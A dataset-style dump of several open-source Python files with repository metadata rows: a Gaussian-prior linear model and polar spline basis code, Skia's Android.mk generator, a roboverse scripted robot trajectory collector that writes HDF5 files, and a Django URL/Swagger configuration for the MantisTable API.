return A
def solve_linear_model(
A, y, y_err=None, prior_mu=None, prior_sigma=None, k=None, errors=False
):
"""
Solves a linear model with design matrix A and observations y:
Aw = y
return the solutions w for the system assuming Gaussian priors.
Alternatively the observation errors, priors, and a boolean mask for the
observations (row axis) can be provided.
Adapted from Luger, Foreman-Mackey & Hogg, 2017
(https://ui.adsabs.harvard.edu/abs/2017RNAAS...1....7L/abstract)
Parameters
----------
A : numpy ndarray or scipy sparce csr matrix
Desging matrix with solution basis
shape n_observations x n_basis
y : numpy ndarray
Observations
shape n_observations
y_err : numpy ndarray, optional
Observation errors
shape n_observations
prior_mu : float, optional
Mean of Gaussian prior values for the weights (w)
prior_sigma : float, optional
Standard deviation of Gaussian prior values for the weights (w)
k : boolean, numpy ndarray, optional
Mask that sets the observations to be used to solve the system
shape n_observations
Returns
-------
w : numpy ndarray
Array with the estimations for the weights
shape n_basis
werrs : numpy ndarray
Array with the error estimations for the weights, returned if y_err is
provided
shape n_basis
"""
if k is None:
k = np.ones(len(y), dtype=bool)
if y_err is not None:
sigma_w_inv = A[k].T.dot(A[k].multiply(1 / y_err[k, None] ** 2))
B = A[k].T.dot((y[k] / y_err[k] ** 2))
else:
sigma_w_inv = A[k].T.dot(A[k])
B = A[k].T.dot(y[k])
if prior_mu is not None and prior_sigma is not None:
sigma_w_inv += np.diag(1 / prior_sigma ** 2)
B += prior_mu / prior_sigma ** 2
if type(sigma_w_inv) == sparse.csr_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == sparse.csc_matrix:
sigma_w_inv = sigma_w_inv.toarray()
if type(sigma_w_inv) == np.matrix:
sigma_w_inv = np.asarray(sigma_w_inv)
w = np.linalg.solve(sigma_w_inv, B)
if errors is True:
w_err = np.linalg.inv(sigma_w_inv).diagonal() ** 0.5
return w, w_err
return w
def _make_A_polar(phi, r, cut_r=1.5, rmin=1, rmax=5, n_r_knots=12, n_phi_knots=15):
"""
Makes a spline design matrix in polar coordinates
Parameters
----------
phi : numpy ndarray
r : numpy ndarray
cut_r : int
rmin : float
Minimum radius value for the array of knots
rmax : float
Maximum radius value for the array of knots
n_r_knots : int
Number of knots to used for the radius axis
n_phi_knots : int
Number of knots to used for the angle axis
Returns
-------
x1 : sparse matrix
Design matrix in polar coordinates using spline as base functions
"""
# create the spline bases for radius and angle
phi_spline = sparse.csr_matrix(wrapped_spline(phi, order=3, nknots=n_phi_knots).T)
r_knots = np.linspace(rmin ** 0.5, rmax ** 0.5, n_r_knots) ** 2
cut_r_int = np.where(r_knots <= cut_r)[0].max()
r_spline = sparse.csr_matrix(
np.asarray(
dmatrix(
"bs(x, knots=knots, degree=3, include_intercept=True)",
{"x": list(r), "knots": r_knots},
)
)
)
# build full desing matrix
X = sparse.hstack(
[phi_spline.multiply(r_spline[:, idx]) for idx in range(r_spline.shape[1])],
format="csr",
)
# find and remove the angle dependency for all basis for radius < 6
cut = np.arange(0, phi_spline.shape[1] * cut_r_int)
a = list(set(np.arange(X.shape[1])) - set(cut))
X1 = sparse.hstack(
[X[:, a], r_spline[:, 1:cut_r_int], sparse.csr_matrix(np.ones(X.shape[0])).T],
format="csr",
)
return X1
def wrapped_spline(input_vector, order=2, nknots=10):
"""
Creates a vector of folded-spline basis according to the input data. This is meant
to be used to build the basis vectors for periodic data, like the angle in polar
coordinates.
Parameters
----------
input_vector : numpy.ndarray
Input data to create basis, angle values MUST BE BETWEEN -PI and PI.
order : int
Order of the spline basis
nknots : int
Number of knots for the splines
Returns
-------
folded_basis : numpy.ndarray
Array of folded-spline basis
"""
if not ((input_vector > -np.pi) & (input_vector < np.pi)).all():
raise ValueError("Must be between -pi and pi")
x = np.copy(input_vector)
x1 = np.hstack([x, x + np.pi * 2])
nt = (nknots * 2) + 1
t = np.linspace(-np.pi, 3 * np.pi, nt)
dt = np.median(np.diff(t))
# Zeroth order basis
basis = np.asarray(
[
((x1 >= t[idx]) & (x1 < t[idx + 1])).astype(float)
for idx in range(len(t) - 1)
]
)
# Higher order basis
for order in np.arange(1, 4):
basis_1 = []
for idx in range(len(t) - 1):
a = ((x1 - t[idx]) / (dt * order)) * basis[idx]
if ((idx + order + 1)) < (nt - 1):
b = (-(x1 - t[(idx + order + 1)]) / (dt * order)) * basis[
(idx + 1) % (nt - 1)
]
else:
b = np.zeros(len(x1))
basis_1.append(a + b)
basis = np.vstack(basis_1)
folded_basis = np.copy(basis)[: nt // 2, : len(x)]
for idx in np.arange(-order, 0):
folded_basis[idx, :] += np.copy(basis)[nt // 2 + idx, len(x) :]
return folded_basis
| 0 | 0 | 0 |
58fb3a80e8c923b6b6872cddc70637f8833f56d6 | 9,842 | py | Python | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | 3 | 2015-08-16T03:44:19.000Z | 2015-08-16T17:31:59.000Z | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | null | null | null | platform_tools/android/gyp_gen/makefile_writer.py | AsdMonio/rr-external_skia | 3839e72932bcef2f26a4f8826bb92b195f6cc396 | [
"Apache-2.0"
] | 20 | 2017-01-09T01:07:17.000Z | 2020-08-19T06:46:45.000Z | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Functions for creating an Android.mk from already created dictionaries.
"""
import os
def write_group(f, name, items, append):
"""Helper function to list all names passed to a variable.
Args:
f: File open for writing (Android.mk)
name: Name of the makefile variable (e.g. LOCAL_CFLAGS)
items: list of strings to be passed to the variable.
append: Whether to append to the variable or overwrite it.
"""
if not items:
return
# Copy the list so we can prepend it with its name.
items_to_write = list(items)
if append:
items_to_write.insert(0, '%s +=' % name)
else:
items_to_write.insert(0, '%s :=' % name)
f.write(' \\\n\t'.join(items_to_write))
f.write('\n\n')
def write_local_vars(f, var_dict, append, name):
"""Helper function to write all the members of var_dict to the makefile.
Args:
f: File open for writing (Android.mk)
var_dict: VarsDict holding the unique values for one configuration.
append: Whether to append to each makefile variable or overwrite it.
name: If not None, a string to be appended to each key.
"""
for key in var_dict.keys():
_key = key
_items = var_dict[key]
if key == 'LOCAL_CFLAGS':
# Always append LOCAL_CFLAGS. This allows us to define some early on in
# the makefile and not overwrite them.
_append = True
elif key == 'DEFINES':
# For DEFINES, we want to append to LOCAL_CFLAGS.
_append = True
_key = 'LOCAL_CFLAGS'
_items_with_D = []
for define in _items:
_items_with_D.append('-D' + define)
_items = _items_with_D
elif key == 'KNOWN_TARGETS':
# KNOWN_TARGETS are not needed in the final make file.
continue
else:
_append = append
if name:
_key += '_' + name
write_group(f, _key, _items, _append)
AUTOGEN_WARNING = (
"""
###############################################################################
#
# THIS FILE IS AUTOGENERATED BY GYP_TO_ANDROID.PY. DO NOT EDIT.
#
# For bugs, please contact scroggo@google.com or djsollen@google.com
#
###############################################################################
"""
)
DEBUGGING_HELP = (
"""
###############################################################################
#
# PROBLEMS WITH SKIA DEBUGGING?? READ THIS...
#
# The debug build results in changes to the Skia headers. This means that those
# using libskia must also be built with the debug version of the Skia headers.
# There are a few scenarios where this comes into play:
#
# (1) You're building debug code that depends on libskia.
# (a) If libskia is built in release, then define SK_RELEASE when building
# your sources.
# (b) If libskia is built with debugging (see step 2), then no changes are
# needed since your sources and libskia have been built with SK_DEBUG.
# (2) You're building libskia in debug mode.
# (a) RECOMMENDED: You can build the entire system in debug mode. Do this by
# updating your build/core/config.mk to include -DSK_DEBUG on the line
# that defines COMMON_GLOBAL_CFLAGS
# (b) You can update all the users of libskia to define SK_DEBUG when they are
# building their sources.
#
# NOTE: If neither SK_DEBUG or SK_RELEASE are defined then Skia checks NDEBUG to
# determine which build type to use.
###############################################################################
"""
)
SKIA_TOOLS = (
"""
#############################################################
# Build the skia tools
#
# benchmark (timings)
include $(BASE_PATH)/bench/Android.mk
# diamond-master (one test to rule them all)
include $(BASE_PATH)/dm/Android.mk
"""
)
STATIC_HEADER = (
"""
###############################################################################
# STATIC LIBRARY
#
# This target is only to be used internally for only one of two purposes...
# (1) statically linking into testing frameworks
# (2) as an inclusion target for the libskia.so shared library
###############################################################################
"""
)
SHARED_HEADER = (
"""
###############################################################################
# SHARED LIBRARY
###############################################################################
"""
)
STATIC_DEPS_INFO = (
"""
###############################################################################
#
# This file contains the shared and static dependencies needed by any target
# that attempts to statically link Skia (i.e. libskia_static build target).
#
# This is a workaround for the fact that the build system does not add these
# transitive dependencies when it attempts to link libskia_static into another
# library.
#
###############################################################################
"""
)
CLEAR_VARS = ("""include $(CLEAR_VARS)\n""")
LOCAL_PATH = ("""LOCAL_PATH:= $(call my-dir)\n""")
class VarsDictData(object):
"""Helper class to keep a VarsDict along with a name and optional condition.
"""
def __init__(self, vars_dict, name, condition=None):
"""Create a new VarsDictData.
Args:
vars_dict: A VarsDict. Can be accessed via self.vars_dict.
name: Name associated with the VarsDict. Can be accessed via
self.name.
condition: Optional string representing a condition. If not None,
used to create a conditional inside the makefile.
"""
self.vars_dict = vars_dict
self.condition = condition
self.name = name
def write_static_deps_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write skia_static_includes.mk,
or None to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'skia_static_deps.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write(STATIC_DEPS_INFO)
for data in deviations_from_common:
var_dict_shared = data.vars_dict['LOCAL_SHARED_LIBRARIES']
var_dict_static = data.vars_dict['LOCAL_STATIC_LIBRARIES']
if data.condition and (var_dict_shared or var_dict_static):
f.write('ifeq ($(%s), true)\n' % data.condition)
write_group(f, 'LOCAL_SHARED_LIBRARIES', var_dict_shared, True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', var_dict_static, True)
if data.condition and (var_dict_shared or var_dict_static):
f.write('endif\n\n')
write_group(f, 'LOCAL_SHARED_LIBRARIES', common['LOCAL_SHARED_LIBRARIES'],
True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', common['LOCAL_STATIC_LIBRARIES'],
True)
def write_android_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write Android.mk, or None
to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'Android.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write('BASE_PATH := $(call my-dir)\n')
f.write(LOCAL_PATH)
f.write(DEBUGGING_HELP)
f.write(STATIC_HEADER)
f.write(CLEAR_VARS)
# need flags to enable feedback driven optimization (FDO) when requested
# by the build system.
f.write('LOCAL_FDO_SUPPORT := true\n')
f.write('ifneq ($(strip $(TARGET_FDO_CFLAGS)),)\n')
f.write('\t# This should be the last -Oxxx specified in LOCAL_CFLAGS\n')
f.write('\tLOCAL_CFLAGS += -O2\n')
f.write('endif\n\n')
f.write('LOCAL_ARM_MODE := thumb\n')
f.write('# used for testing\n')
f.write('#LOCAL_CFLAGS += -g -O0\n\n')
# update the provided LOCAL_MODULE with a _static suffix
local_module = common['LOCAL_MODULE'][0]
static_local_module = local_module + '_static'
common['LOCAL_MODULE'].reset()
common['LOCAL_MODULE'].add(static_local_module)
write_local_vars(f, common, False, None)
for data in deviations_from_common:
if data.condition:
f.write('ifeq ($(%s), true)\n' % data.condition)
write_local_vars(f, data.vars_dict, True, data.name)
if data.condition:
f.write('endif\n\n')
f.write('LOCAL_MODULE_CLASS := STATIC_LIBRARIES\n')
f.write('include $(BUILD_STATIC_LIBRARY)\n\n')
f.write(SHARED_HEADER)
f.write(CLEAR_VARS)
f.write('LOCAL_MODULE_CLASS := SHARED_LIBRARIES\n')
f.write('LOCAL_MODULE := %s\n' % local_module)
f.write('LOCAL_WHOLE_STATIC_LIBRARIES := %s\n' % static_local_module)
write_group(f, 'LOCAL_EXPORT_C_INCLUDE_DIRS',
common['LOCAL_EXPORT_C_INCLUDE_DIRS'], False)
f.write('include $(BASE_PATH)/skia_static_deps.mk\n')
f.write('include $(BUILD_SHARED_LIBRARY)\n')
f.write(SKIA_TOOLS)
| 33.705479 | 80 | 0.63605 | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Functions for creating an Android.mk from already created dictionaries.
"""
import os
def write_group(f, name, items, append):
"""Helper function to list all names passed to a variable.
Args:
f: File open for writing (Android.mk)
name: Name of the makefile variable (e.g. LOCAL_CFLAGS)
items: list of strings to be passed to the variable.
append: Whether to append to the variable or overwrite it.
"""
if not items:
return
# Copy the list so we can prepend it with its name.
items_to_write = list(items)
if append:
items_to_write.insert(0, '%s +=' % name)
else:
items_to_write.insert(0, '%s :=' % name)
f.write(' \\\n\t'.join(items_to_write))
f.write('\n\n')
def write_local_vars(f, var_dict, append, name):
"""Helper function to write all the members of var_dict to the makefile.
Args:
f: File open for writing (Android.mk)
var_dict: VarsDict holding the unique values for one configuration.
append: Whether to append to each makefile variable or overwrite it.
name: If not None, a string to be appended to each key.
"""
for key in var_dict.keys():
_key = key
_items = var_dict[key]
if key == 'LOCAL_CFLAGS':
# Always append LOCAL_CFLAGS. This allows us to define some early on in
# the makefile and not overwrite them.
_append = True
elif key == 'DEFINES':
# For DEFINES, we want to append to LOCAL_CFLAGS.
_append = True
_key = 'LOCAL_CFLAGS'
_items_with_D = []
for define in _items:
_items_with_D.append('-D' + define)
_items = _items_with_D
elif key == 'KNOWN_TARGETS':
# KNOWN_TARGETS are not needed in the final make file.
continue
else:
_append = append
if name:
_key += '_' + name
write_group(f, _key, _items, _append)
AUTOGEN_WARNING = (
"""
###############################################################################
#
# THIS FILE IS AUTOGENERATED BY GYP_TO_ANDROID.PY. DO NOT EDIT.
#
# For bugs, please contact scroggo@google.com or djsollen@google.com
#
###############################################################################
"""
)
DEBUGGING_HELP = (
"""
###############################################################################
#
# PROBLEMS WITH SKIA DEBUGGING?? READ THIS...
#
# The debug build results in changes to the Skia headers. This means that those
# using libskia must also be built with the debug version of the Skia headers.
# There are a few scenarios where this comes into play:
#
# (1) You're building debug code that depends on libskia.
# (a) If libskia is built in release, then define SK_RELEASE when building
# your sources.
# (b) If libskia is built with debugging (see step 2), then no changes are
# needed since your sources and libskia have been built with SK_DEBUG.
# (2) You're building libskia in debug mode.
# (a) RECOMMENDED: You can build the entire system in debug mode. Do this by
# updating your build/core/config.mk to include -DSK_DEBUG on the line
# that defines COMMON_GLOBAL_CFLAGS
# (b) You can update all the users of libskia to define SK_DEBUG when they are
# building their sources.
#
# NOTE: If neither SK_DEBUG or SK_RELEASE are defined then Skia checks NDEBUG to
# determine which build type to use.
###############################################################################
"""
)
SKIA_TOOLS = (
"""
#############################################################
# Build the skia tools
#
# benchmark (timings)
include $(BASE_PATH)/bench/Android.mk
# diamond-master (one test to rule them all)
include $(BASE_PATH)/dm/Android.mk
"""
)
STATIC_HEADER = (
"""
###############################################################################
# STATIC LIBRARY
#
# This target is only to be used internally for only one of two purposes...
# (1) statically linking into testing frameworks
# (2) as an inclusion target for the libskia.so shared library
###############################################################################
"""
)
SHARED_HEADER = (
"""
###############################################################################
# SHARED LIBRARY
###############################################################################
"""
)
STATIC_DEPS_INFO = (
"""
###############################################################################
#
# This file contains the shared and static dependencies needed by any target
# that attempts to statically link Skia (i.e. libskia_static build target).
#
# This is a workaround for the fact that the build system does not add these
# transitive dependencies when it attempts to link libskia_static into another
# library.
#
###############################################################################
"""
)
CLEAR_VARS = ("""include $(CLEAR_VARS)\n""")
LOCAL_PATH = ("""LOCAL_PATH:= $(call my-dir)\n""")
class VarsDictData(object):
"""Helper class to keep a VarsDict along with a name and optional condition.
"""
def __init__(self, vars_dict, name, condition=None):
"""Create a new VarsDictData.
Args:
vars_dict: A VarsDict. Can be accessed via self.vars_dict.
name: Name associated with the VarsDict. Can be accessed via
self.name.
condition: Optional string representing a condition. If not None,
used to create a conditional inside the makefile.
"""
self.vars_dict = vars_dict
self.condition = condition
self.name = name
def write_static_deps_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write skia_static_includes.mk,
or None to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'skia_static_deps.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write(STATIC_DEPS_INFO)
for data in deviations_from_common:
var_dict_shared = data.vars_dict['LOCAL_SHARED_LIBRARIES']
var_dict_static = data.vars_dict['LOCAL_STATIC_LIBRARIES']
if data.condition and (var_dict_shared or var_dict_static):
f.write('ifeq ($(%s), true)\n' % data.condition)
write_group(f, 'LOCAL_SHARED_LIBRARIES', var_dict_shared, True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', var_dict_static, True)
if data.condition and (var_dict_shared or var_dict_static):
f.write('endif\n\n')
write_group(f, 'LOCAL_SHARED_LIBRARIES', common['LOCAL_SHARED_LIBRARIES'],
True)
write_group(f, 'LOCAL_STATIC_LIBRARIES', common['LOCAL_STATIC_LIBRARIES'],
True)
def write_android_mk(target_dir, common, deviations_from_common):
"""Given all the variables, write the final make file.
Args:
target_dir: The full path to the directory to write Android.mk, or None
to use the current working directory.
common: VarsDict holding variables definitions common to all
configurations.
deviations_from_common: List of VarsDictData, one for each possible
configuration. VarsDictData.name will be appended to each key before
writing it to the makefile. VarsDictData.condition, if not None, will be
written to the makefile as a condition to determine whether to include
VarsDictData.vars_dict.
"""
target_file = 'Android.mk'
if target_dir:
target_file = os.path.join(target_dir, target_file)
with open(target_file, 'w') as f:
f.write(AUTOGEN_WARNING)
f.write('BASE_PATH := $(call my-dir)\n')
f.write(LOCAL_PATH)
f.write(DEBUGGING_HELP)
f.write(STATIC_HEADER)
f.write(CLEAR_VARS)
# need flags to enable feedback driven optimization (FDO) when requested
# by the build system.
f.write('LOCAL_FDO_SUPPORT := true\n')
f.write('ifneq ($(strip $(TARGET_FDO_CFLAGS)),)\n')
f.write('\t# This should be the last -Oxxx specified in LOCAL_CFLAGS\n')
f.write('\tLOCAL_CFLAGS += -O2\n')
f.write('endif\n\n')
f.write('LOCAL_ARM_MODE := thumb\n')
f.write('# used for testing\n')
f.write('#LOCAL_CFLAGS += -g -O0\n\n')
# update the provided LOCAL_MODULE with a _static suffix
local_module = common['LOCAL_MODULE'][0]
static_local_module = local_module + '_static'
common['LOCAL_MODULE'].reset()
common['LOCAL_MODULE'].add(static_local_module)
write_local_vars(f, common, False, None)
for data in deviations_from_common:
if data.condition:
f.write('ifeq ($(%s), true)\n' % data.condition)
write_local_vars(f, data.vars_dict, True, data.name)
if data.condition:
f.write('endif\n\n')
f.write('LOCAL_MODULE_CLASS := STATIC_LIBRARIES\n')
f.write('include $(BUILD_STATIC_LIBRARY)\n\n')
f.write(SHARED_HEADER)
f.write(CLEAR_VARS)
f.write('LOCAL_MODULE_CLASS := SHARED_LIBRARIES\n')
f.write('LOCAL_MODULE := %s\n' % local_module)
f.write('LOCAL_WHOLE_STATIC_LIBRARIES := %s\n' % static_local_module)
write_group(f, 'LOCAL_EXPORT_C_INCLUDE_DIRS',
common['LOCAL_EXPORT_C_INCLUDE_DIRS'], False)
f.write('include $(BASE_PATH)/skia_static_deps.mk\n')
f.write('include $(BUILD_SHARED_LIBRARY)\n')
f.write(SKIA_TOOLS)
| 0 | 0 | 0 |
87e3d4ce5ec6959c3eb2645e9291823efb370d74 | 8,234 | py | Python | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | scripts/scripted_collect.py | VentusYue/roboverse | bd19e0ef7bdcae1198aa768bfe9fc18c51878b6d | [
"MIT"
] | null | null | null | import numpy as np
import time
import os
import os.path as osp
import roboverse
from roboverse.policies import policies
import argparse
from tqdm import tqdm
import h5py
from roboverse.utils import get_timestamp
EPSILON = 0.1
def dump2h5(traj, path, image_rendered):
"""Dumps a collected trajectory to HDF5 file."""
# convert to numpy arrays
states = np.array([o['state'] for o in traj['observations']])
if image_rendered:
images = np.array([o['image'] for o in traj['observations']])
actions = np.array(traj['actions'])
rewards = np.array(traj['rewards'])
terminals = np.array(traj['terminals'])
# create HDF5 file
f = h5py.File(path, "w")
f.create_dataset("traj_per_file", data=1)
# store trajectory info in traj0 group
traj_data = f.create_group("traj0")
traj_data.create_dataset("states", data=states)
if image_rendered:
traj_data.create_dataset("images", data=images, dtype=np.uint8)
traj_data.create_dataset("actions", data=actions)
traj_data.create_dataset("rewards", data=rewards)
if np.sum(terminals) == 0:
terminals[-1] = True
# build pad-mask that indicates how long sequence is
is_terminal_idxs = np.nonzero(terminals)[0]
pad_mask = np.zeros((len(terminals),))
pad_mask[:is_terminal_idxs[0]] = 1.
traj_data.create_dataset("pad_mask", data=pad_mask)
f.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--env-name", type=str, required=True)
parser.add_argument("-nt", "--num-task", type=int, default=3)
parser.add_argument("-pl", "--policy-name", type=str, required=True)
parser.add_argument("-a", "--accept-trajectory-key", type=str, required=True)
parser.add_argument("-n", "--num-trajectories", type=int, required=True)
parser.add_argument("-t", "--num-timesteps", type=int, required=True)
parser.add_argument("--save-all", action='store_true', default=False)
parser.add_argument("--gui", action='store_true', default=False)
parser.add_argument("-o", "--target-object", type=str)
parser.add_argument("-d", "--save-directory", type=str, default=""),
parser.add_argument("--noise", type=float, default=0.1)
parser.add_argument("-r", "--image-rendered", type=int, default=0)
parser.add_argument("-f", "--full-reward", type=int, default=0)
args = parser.parse_args()
main(args)
| 36.114035 | 100 | 0.629342 | import numpy as np
import time
import os
import os.path as osp
import roboverse
from roboverse.policies import policies
import argparse
from tqdm import tqdm
import h5py
from roboverse.utils import get_timestamp
EPSILON = 0.1
def add_transition(traj, observation, action, reward, info, agent_info, done,
next_observation, img_dim, image_rendered=True):
if image_rendered:
observation["image"] = np.reshape(np.uint8(observation["image"] * 255.),
(img_dim, img_dim, 3))
next_observation["image"] = np.reshape(
np.uint8(next_observation["image"] * 255.), (img_dim, img_dim, 3))
traj["observations"].append(observation)
traj["next_observations"].append(next_observation)
traj["actions"].append(action)
traj["rewards"].append(reward)
traj["terminals"].append(done)
traj["agent_infos"].append(agent_info)
traj["env_infos"].append(info)
return traj
def collect_one_traj(env, policy, num_timesteps, noise,
accept_trajectory_key, image_rendered, args):
num_steps = -1
rewards = []
success = False
img_dim = env.observation_img_dim
env.reset()
policy.reset()
time.sleep(1)
traj = dict(
observations=[],
actions=[],
rewards=[],
next_observations=[],
terminals=[],
agent_infos=[],
env_infos=[],
)
is_opened = False
is_closed = False
total_reward = 0
total_reward_thresh = sum([subtask.REWARD for subtask in env.subtasks])
for j in range(num_timesteps):
action, agent_info, add_noise = policy.get_action()
# In case we need to pad actions by 1 for easier realNVP modelling
env_action_dim = env.action_space.shape[0]
if env_action_dim - action.shape[0] == 1:
action = np.append(action, 0)
if add_noise:
action += np.random.normal(scale=noise, size=(env_action_dim,))
else:
action += np.random.normal(scale=noise*0.3, size=(env_action_dim,))
# action += np.random.normal(scale=noise, size=(env_action_dim,))
action = np.clip(action, -1 + EPSILON, 1 - EPSILON)
observation = env.get_observation()
next_observation, reward, done, info = env.step(action)
# import pdb; pdb.set_trace()
add_transition(traj, observation, action, reward, info, agent_info,
done, next_observation, img_dim, image_rendered)
total_reward += reward
if accept_trajectory_key == 'table_clean':
# print(total_reward)
if total_reward == total_reward_thresh and num_steps < 0:
num_steps = j
if total_reward == total_reward_thresh :
success = True
# print(f"time {j}")
else:
if info[accept_trajectory_key] and num_steps < 0:
num_steps = j
if info[accept_trajectory_key]:
success = True
rewards.append(reward)
if done or agent_info['done']:
break
return traj, success, num_steps
def dump2h5(traj, path, image_rendered):
"""Dumps a collected trajectory to HDF5 file."""
# convert to numpy arrays
states = np.array([o['state'] for o in traj['observations']])
if image_rendered:
images = np.array([o['image'] for o in traj['observations']])
actions = np.array(traj['actions'])
rewards = np.array(traj['rewards'])
terminals = np.array(traj['terminals'])
# create HDF5 file
f = h5py.File(path, "w")
f.create_dataset("traj_per_file", data=1)
# store trajectory info in traj0 group
traj_data = f.create_group("traj0")
traj_data.create_dataset("states", data=states)
if image_rendered:
traj_data.create_dataset("images", data=images, dtype=np.uint8)
traj_data.create_dataset("actions", data=actions)
traj_data.create_dataset("rewards", data=rewards)
if np.sum(terminals) == 0:
terminals[-1] = True
# build pad-mask that indicates how long sequence is
is_terminal_idxs = np.nonzero(terminals)[0]
pad_mask = np.zeros((len(terminals),))
pad_mask[:is_terminal_idxs[0]] = 1.
traj_data.create_dataset("pad_mask", data=pad_mask)
f.close()
def main(args):
timestamp = get_timestamp()
data_save_path = args.save_directory
data_save_path = osp.abspath(data_save_path)
if not osp.exists(data_save_path):
os.makedirs(data_save_path)
env = roboverse.make(args.env_name,
gui=args.gui,
transpose_image=False)
data = []
assert args.policy_name in policies.keys(), f"The policy name must be one of: {policies.keys()}"
# assert args.accept_trajectory_key in env.get_info().keys(), \
# f"""The accept trajectory key must be one of: {env.get_info().keys()}"""
policy_class = policies[args.policy_name]
policy = policy_class(env)
num_success = 0
num_saved = 0
num_attempts = 0
accept_trajectory_key = args.accept_trajectory_key
progress_bar = tqdm(total=args.num_trajectories)
total_area_occurance = [0, 0, 0]
total_object_occurance = {}
for object_name in env.object_names:
total_object_occurance[object_name] = 0
while num_saved < args.num_trajectories:
num_attempts += 1
traj, success, num_steps = collect_one_traj(
env, policy, args.num_timesteps, args.noise,
accept_trajectory_key, args.image_rendered, args)
# print("num_timesteps: ", num_steps)
if success:
if args.gui:
print("num_timesteps: ", num_steps)
data.append(traj)
dump2h5(traj, os.path.join(data_save_path, 'rollout_{}.h5'.format(num_saved)),
args.image_rendered)
num_success += 1
num_saved += 1
area_occurance, object_occurance = env.get_occurance()
for i in range(len(area_occurance)):
total_area_occurance[i] += area_occurance[i]
for object_name in env.object_names:
total_object_occurance[object_name] += object_occurance[object_name]
# print(total_area_occurance, total_object_occurance)
fo = open(os.path.join(data_save_path, 'occurance.txt'), "w")
str_area = f"area_occurance: {total_area_occurance}\n"
str_object = f"object_occurance: {total_object_occurance}\n"
fo.write(str_area)
fo.write(str_object)
fo.close()
progress_bar.update(1)
elif args.save_all:
data.append(traj)
num_saved += 1
progress_bar.update(1)
if args.gui:
print("success rate: {}".format(num_success/(num_attempts)))
progress_bar.close()
print("success rate: {}".format(num_success / (num_attempts)))
print(total_area_occurance, total_object_occurance)
path = osp.join(data_save_path, "scripted_{}_{}.npy".format(
args.env_name, timestamp))
print(path)
np.save(path, data)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--env-name", type=str, required=True)
parser.add_argument("-nt", "--num-task", type=int, default=3)
parser.add_argument("-pl", "--policy-name", type=str, required=True)
parser.add_argument("-a", "--accept-trajectory-key", type=str, required=True)
parser.add_argument("-n", "--num-trajectories", type=int, required=True)
parser.add_argument("-t", "--num-timesteps", type=int, required=True)
parser.add_argument("--save-all", action='store_true', default=False)
parser.add_argument("--gui", action='store_true', default=False)
parser.add_argument("-o", "--target-object", type=str)
parser.add_argument("-d", "--save-directory", type=str, default=""),
parser.add_argument("--noise", type=float, default=0.1)
parser.add_argument("-r", "--image-rendered", type=int, default=0)
parser.add_argument("-f", "--full-reward", type=int, default=0)
args = parser.parse_args()
main(args)
| 5,732 | 0 | 69 |
7d61c1160eddb50ddcacb8eb204ce8b18e82bfac | 2,349 | py | Python | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | django/mantistable/urls.py | sizxy3462g5829bz/mantistable4-modified | d894ade055da4aa7f7febb10ead3527fa6cdc57a | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import RedirectView
from rest_framework_swagger import renderers
from rest_framework import exceptions
from rest_framework.permissions import AllowAny
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.response import Response
from rest_framework.schemas import SchemaGenerator
from rest_framework.views import APIView
from api import urls as api_urls
from web_api import urls as webapi_urls
def get_swagger_view(title=None, url=None, patterns=None, urlconf=None, description=None):
"""
Returns schema view which renders Swagger/OpenAPI.
"""
return SwaggerSchemaView.as_view()
mantis_schema_view = get_swagger_view(
title='MantisTable API',
url="/api",
urlconf=api_urls,
description="MantisTable API allows to identify annotations (Entity Linking, Predicate Annotation, Concept Annotation) by using a non-destructive, incremental approach"
)
